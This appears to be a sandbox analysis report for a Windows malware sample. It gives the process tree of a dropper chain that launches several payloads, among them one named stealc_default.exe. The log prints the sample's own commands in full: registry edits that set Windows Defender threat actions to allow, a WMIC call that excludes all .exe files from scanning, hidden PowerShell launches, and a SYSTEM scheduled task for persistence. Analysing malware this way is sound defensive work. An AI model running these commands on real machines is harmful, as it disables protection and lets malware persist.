343ea56746b6f08c7eccbfbb9fe1a544952a9a933140c677179f4f8c7bb60b81.exe 86 PID 4544 wrote to memory of 4308 4544 343ea56746b6f08c7eccbfbb9fe1a544952a9a933140c677179f4f8c7bb60b81.exe 86 PID 4544 wrote to memory of 4308 4544 343ea56746b6f08c7eccbfbb9fe1a544952a9a933140c677179f4f8c7bb60b81.exe 86 PID 4308 wrote to memory of 2452 4308 343ea56746b6f08c7eccbfbb9fe1a544952a9a933140c677179f4f8c7bb60b81.exe 90 PID 4308 wrote to memory of 2452 4308 343ea56746b6f08c7eccbfbb9fe1a544952a9a933140c677179f4f8c7bb60b81.exe 90 PID 4308 wrote to memory of 2452 4308 343ea56746b6f08c7eccbfbb9fe1a544952a9a933140c677179f4f8c7bb60b81.exe 90 PID 2452 wrote to memory of 4120 2452 ednfosi.exe 91 PID 2452 wrote to memory of 4120 2452 ednfosi.exe 91 PID 2452 wrote to memory of 4120 2452 ednfosi.exe 91 PID 2452 wrote to memory of 4120 2452 ednfosi.exe 91 PID 2452 wrote to memory of 4120 2452 ednfosi.exe 91 PID 2452 wrote to memory of 4120 2452 ednfosi.exe 91 PID 2452 wrote to memory of 4120 2452 ednfosi.exe 91 PID 2452 wrote to memory of 4120 2452 ednfosi.exe 91 PID 2452 wrote to memory of 4120 2452 ednfosi.exe 91 PID 2452 wrote to memory of 4120 2452 ednfosi.exe 91 PID 4120 wrote to memory of 392 4120 ednfosi.exe 92 PID 4120 wrote to memory of 392 4120 ednfosi.exe 92 PID 4120 wrote to memory of 392 4120 ednfosi.exe 92 PID 4120 wrote to memory of 4180 4120 ednfosi.exe 93 PID 4120 wrote to memory of 4180 4120 ednfosi.exe 93 PID 4120 wrote to memory of 4180 4120 ednfosi.exe 93 PID 392 wrote to memory of 1256 392 037281a4eb.exe 95 PID 392 wrote to memory of 1256 392 037281a4eb.exe 95 PID 392 wrote to memory of 1256 392 037281a4eb.exe 95 PID 2192 wrote to memory of 4068 2192 GOLD.exe 100 PID 2192 wrote to memory of 4068 2192 GOLD.exe 100 PID 2192 wrote to memory of 4068 2192 GOLD.exe 100 PID 2192 wrote to memory of 2252 2192 GOLD.exe 102 PID 2192 wrote to memory of 2252 2192 GOLD.exe 102 PID 2192 wrote to memory of 2252 2192 GOLD.exe 102 PID 4120 wrote to memory of 4344 4120 ednfosi.exe 101 PID 4120 wrote to memory of 4344 4120 ednfosi.exe 101 PID 2192 wrote to memory of 2252 2192 GOLD.exe 102 PID 2192 wrote to memory of 2252 2192 GOLD.exe 102 PID 2192 wrote to memory of 2252 2192 GOLD.exe 102 PID 2192 wrote to memory of 2252 2192 GOLD.exe 102 PID 2192 wrote to memory of 2252 2192 GOLD.exe 102 PID 4344 wrote to memory of 5092 4344 ufileee.exe 104 PID 4344 wrote to memory of 5092 4344 ufileee.exe 104 PID 4344 wrote to memory of 5092 4344 ufileee.exe 104 PID 4344 wrote to memory of 5092 4344 ufileee.exe 104 PID 4344 wrote to memory of 5092 4344 ufileee.exe 104 PID 4344 wrote to memory of 5092 4344 ufileee.exe 104 PID 4344 wrote to memory of 5092 4344 ufileee.exe 104 PID 4344 wrote to memory of 5092 4344 ufileee.exe 104 PID 5092 wrote to memory of 2416 5092 CasPol.exe 105 PID 5092 wrote to memory of 2416 5092 CasPol.exe 105 PID 4120 wrote to memory of 1828 4120 ednfosi.exe 106 PID 4120 wrote to memory of 1828 4120 ednfosi.exe 106 PID 5092 wrote to memory of 756 5092 CasPol.exe 110 PID 5092 wrote to memory of 756 5092 CasPol.exe 110 PID 5092 wrote to memory of 756 5092 CasPol.exe 110 PID 756 wrote to memory of 4220 756 qi8j6Qm0T07Znl95ddV2pQrt.exe 113 PID 756 wrote to memory of 4220 756 qi8j6Qm0T07Znl95ddV2pQrt.exe 113 PID 756 wrote to memory of 4220 756 qi8j6Qm0T07Znl95ddV2pQrt.exe 113 PID 4220 wrote to memory of 244 4220 Install.exe 115
Processes
-
C:\Users\Admin\AppData\Local\Temp\343ea56746b6f08c7eccbfbb9fe1a544952a9a933140c677179f4f8c7bb60b81.exe"C:\Users\Admin\AppData\Local\Temp\343ea56746b6f08c7eccbfbb9fe1a544952a9a933140c677179f4f8c7bb60b81.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4544 -
C:\Users\Admin\AppData\Local\Temp\343ea56746b6f08c7eccbfbb9fe1a544952a9a933140c677179f4f8c7bb60b81.exe"C:\Users\Admin\AppData\Local\Temp\343ea56746b6f08c7eccbfbb9fe1a544952a9a933140c677179f4f8c7bb60b81.exe"2⤵
- Checks computer location settings
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4308 -
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2452 -
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4120 -
C:\Users\Admin\AppData\Local\Temp\1000031001\037281a4eb.exe"C:\Users\Admin\AppData\Local\Temp\1000031001\037281a4eb.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:392 -
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- System Location Discovery: System Language Discovery
PID:1256 -
C:\Users\Admin\AppData\Local\Temp\1000002001\GOLD.exe"C:\Users\Admin\AppData\Local\Temp\1000002001\GOLD.exe"7⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2192 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"8⤵PID:4068
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"8⤵
- Suspicious behavior: EnumeratesProcesses
PID:2252
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe"C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe"7⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:2928 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"8⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:632 -
C:\Users\Admin\AppData\Roaming\X1X1y5g7fQ.exe"C:\Users\Admin\AppData\Roaming\X1X1y5g7fQ.exe"9⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2792
-
-
C:\Users\Admin\AppData\Roaming\pZITMGCoo2.exe"C:\Users\Admin\AppData\Roaming\pZITMGCoo2.exe"9⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4068
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000005001\newalp.exe"C:\Users\Admin\AppData\Local\Temp\1000005001\newalp.exe"7⤵
- Drops file in Windows directory
- Suspicious use of FindShellTrayWindow
PID:460 -
C:\Users\Admin\AppData\Local\Temp\0ae19c9b3d\Hkbsse.exe"C:\Users\Admin\AppData\Local\Temp\0ae19c9b3d\Hkbsse.exe"8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2600
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000050001\06082025.exe"C:\Users\Admin\AppData\Local\Temp\1000050001\06082025.exe"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3812
-
-
C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default.exe"C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default.exe"7⤵
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:1984
-
-
C:\Users\Admin\AppData\Local\Temp\1000069001\umrfile%20.exe"C:\Users\Admin\AppData\Local\Temp\1000069001\umrfile%20.exe"7⤵
- Suspicious use of SetThreadContext
PID:4908 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"8⤵PID:4180
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"8⤵PID:536
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"8⤵
- Drops startup file
- System Location Discovery: System Language Discovery
PID:872 -
C:\Users\Admin\Pictures\NR0IP8IgPDsKYeCqF2QdARha.exe"C:\Users\Admin\Pictures\NR0IP8IgPDsKYeCqF2QdARha.exe"9⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1612 -
C:\Users\Admin\AppData\Local\Temp\7zS4B57.tmp\Install.exe.\Install.exe10⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5080 -
C:\Users\Admin\AppData\Local\Temp\7zS4DC8.tmp\Install.exe.\Install.exe /chnsTdidx "385104" /S11⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Enumerates system info in registry
PID:740 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"12⤵
- System Location Discovery: System Language Discovery
PID:3624 -
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"13⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:2708 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 614⤵
- System Location Discovery: System Language Discovery
PID:1172 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 615⤵
- System Location Discovery: System Language Discovery
PID:4584
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"13⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:4028 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 614⤵
- System Location Discovery: System Language Discovery
PID:3992 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 615⤵PID:64
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"13⤵
- Indirect Command Execution
PID:4092 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 614⤵
- System Location Discovery: System Language Discovery
PID:5020 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 615⤵PID:3640
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"13⤵
- Indirect Command Execution
PID:1840 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 614⤵PID:3364
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 615⤵PID:460
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"13⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:3608 -
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force14⤵
- System Location Discovery: System Language Discovery
PID:3904 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force15⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:952 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force16⤵
- System Location Discovery: System Language Discovery
PID:4576
-
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"12⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:5032 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV113⤵PID:4584
-
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True13⤵PID:452
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True14⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3132 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True15⤵
- System Location Discovery: System Language Discovery
PID:2388
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bvobQgTgLADiTwblyc" /SC once /ST 08:57:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS4DC8.tmp\Install.exe\" Sj /APYdidXun 385104 /S" /V1 /F12⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1128
-
-
-
-
-
C:\Users\Admin\Pictures\pkdbPxZFwyrmcEjaoWyOHETq.exe"C:\Users\Admin\Pictures\pkdbPxZFwyrmcEjaoWyOHETq.exe"9⤵
- Executes dropped EXE
- Checks processor information in registry
PID:1060
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000032001\kitty.exe"C:\Users\Admin\AppData\Local\Temp\1000032001\kitty.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4180 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4180 -s 4886⤵
- Program crash
PID:5036
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000033001\ufileee.exe"C:\Users\Admin\AppData\Local\Temp\1000033001\ufileee.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4344 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"6⤵
- Drops startup file
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5092 -
C:\Users\Admin\Pictures\oDEFNRg49DXhDGsyNPUDYfRd.exe"C:\Users\Admin\Pictures\oDEFNRg49DXhDGsyNPUDYfRd.exe"7⤵
- Executes dropped EXE
PID:2416
-
-
C:\Users\Admin\Pictures\qi8j6Qm0T07Znl95ddV2pQrt.exe"C:\Users\Admin\Pictures\qi8j6Qm0T07Znl95ddV2pQrt.exe"7⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:756 -
C:\Users\Admin\AppData\Local\Temp\7zS323.tmp\Install.exe.\Install.exe8⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4220 -
C:\Users\Admin\AppData\Local\Temp\7zS7A7.tmp\Install.exe.\Install.exe /zfRtdidVtnj "385121" /S9⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:244 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"10⤵
- System Location Discovery: System Language Discovery
PID:3180 -
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"11⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:3596 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 612⤵
- System Location Discovery: System Language Discovery
PID:2156 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 613⤵
- System Location Discovery: System Language Discovery
PID:4056
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"11⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:4644 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 612⤵
- System Location Discovery: System Language Discovery
PID:4956 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 613⤵PID:1172
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"11⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:1240 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 612⤵
- System Location Discovery: System Language Discovery
PID:1384 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 613⤵PID:4616
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"11⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:1252 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 612⤵
- System Location Discovery: System Language Discovery
PID:4504 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 613⤵
- System Location Discovery: System Language Discovery
PID:3020
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"11⤵
- Indirect Command Execution
PID:2496 -
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force12⤵
- System Location Discovery: System Language Discovery
PID:3992 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force13⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4584 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force14⤵
- System Location Discovery: System Language Discovery
PID:3804
-
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"10⤵
- Indirect Command Execution
PID:2644 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True11⤵
- System Location Discovery: System Language Discovery
PID:820 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True12⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4088 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True13⤵
- Suspicious use of AdjustPrivilegeToken
PID:2180
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bvobQgTgLADiTwblyc" /SC once /ST 08:57:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS7A7.tmp\Install.exe\" Sj /eHldidwVu 385121 /S" /V1 /F10⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1264
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000034001\Operation6572.exe"C:\Users\Admin\AppData\Local\Temp\1000034001\Operation6572.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1828
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4180 -ip 41801⤵PID:4432
-
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exeC:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:820
-
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exeC:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4796 -
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"2⤵
- Executes dropped EXE
PID:4008
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4DC8.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zS4DC8.tmp\Install.exe Sj /APYdidXun 385104 /S1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:1464 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵
- System Location Discovery: System Language Discovery
PID:3600 -
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:228 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵
- System Location Discovery: System Language Discovery
PID:2184 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
- System Location Discovery: System Language Discovery
PID:1808
-
-
-
-
